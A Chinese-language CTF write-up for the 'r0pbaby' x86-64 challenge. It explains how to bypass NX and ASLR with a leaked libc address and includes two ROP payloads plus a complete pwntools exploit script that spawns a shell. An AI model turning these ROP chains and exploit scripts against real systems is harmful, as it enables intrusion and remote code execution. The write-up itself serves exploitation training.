经典的rop利用题目

作为一枚菜鸡，希望能从基础开始多学点东西 首先file命令查看文件类型为64位程序

用checksec查看开启的保护，可以看到，开启了堆栈不可执行、地址分布随机化

执行程序，有以下这些选项

选项1给出libc的地址

选项2给出libc其中一个函数的地址 选项3可以向栈中输入小于1024的任意数据

首先测试溢出点

通过peda自带的pattern_create和pattern_offset进行溢出填充位数判断

可以得到溢出填充位为8字节，之后紧接着就是ret的地址，可以进行覆盖

在这里一般思路就是覆盖为system或者其他可以执行系统命令的函数地址，使得可以getshell 需要注意的是，64位系统中通过寄存器传参，函数传参顺序是RDI,RSI,RDX,RCX,R8,R9 调用system等函数时需要先给RDI寄存器赋值参数内容'/bin/sh' 使得最后执行system('/bin/sh')，因此需要构造栈布局 这里有两种ROP的利用方法

0x01

首先是考虑先赋值RDI内容为'/bin/sh'，之后再调用system函数

因此在这里需要找到gaget

这样我们的payload如下所示：

payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)

ret到pop rid ; ret的地址进行执行，将栈中sh_addr（'/bin/sh'的地址）传到RDI寄存器，接着ret到system_addr（sysem函数的地址）执行shell

0x02

还可以通过找到先pop寄存器，然后直接call寄存器的gaget来利用

这样的利用栈布局就如下payload所示

payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)

ret到pop rax ; pop rdi ; call rax，将栈中system_addr传到RAX寄存器，将sh_addr传到RDI寄存器，之后直接CALL RAX来执行shell

payload和栈布局找好了，接下来就是写脚本利用了

还需要得到system在libc中的地址和'/bin/sh'字符串的地址 而'/bin/sh'在libc中已经存在了，可以通过Winhex查找，也可以通过IDA查找，这里注意，找到的是offset address

在IDA中按shift+f12，再通过ctrl+f搜索也可以找到

system的内存加载地址可以通过程序的选项2直接获取，再通过system在libc中固定的偏移地址，就可以得到libc的实际加载地址，并且能够获得其他所有函数和'/bin/sh'的实际加载地址。可以使用pwntools工具来获取offset address

from pwn import *libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")system_offset = libc.symbols['system']p.recvuntil(": ")p.sendline("2")p.recvuntil(": ")p.sendline("system")system_addr = p.recvline().split(": ")[1].strip("\n")system_addr = long(system_addr,16)

拿到system的实际地址和偏移地址offset addr之后，就可以拿到'/bin/sh'的实际地址

sh_addr = system_addr + sh_offset - system_offset

最后system和'/bin/sh'的地址都拿到，两种payload都可以生效

from pwn import *p = process("./r0pbaby")elf = ELF("r0pbaby")libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")system_offset = libc.symbols['system']sh_offset = 0x179ef5bss_addr = elf.bss()pop_rdi_ret_offset = 0x00000000000208efppc_addr_offset = 0x00000000000f53ebp.recvuntil(": ")p.sendline("1")libc_addr = p.recvline().split(": ")[1].strip("\n")libc_addr = long(libc_addr,16)print "libc_addr:%x" % libc_addrp.recvuntil(": ")p.sendline("2")p.recvuntil(": ")p.sendline("system")system_addr = p.recvline().split(": ")[1].strip("\n")system_addr = long(system_addr,16)sh_addr = system_addr + sh_offset - system_offsetpop_rdi_ret = system_addr + pop_rdi_ret_offset - system_offsetppc_addr = system_addr + ppc_addr_offset - system_offsetprint "system_addr:%x" % system_addrprint "base_addr:%x" % (system_addr - system_offset)p.recvuntil(": ")p.sendline("3")p.recvuntil(": ")#payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr) payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)length = str(len(payload))print lengthprint payloadp.sendline(length)p.sendline(payload)p.recv()p.interactive()

ps:

一开始写脚本直接用选项1的地址做libc基地址来加上偏移，发现怎么都是错的

选项1给出的地址不是libc的基地址，需要用选项2的函数地址泄露来算出libc的基地址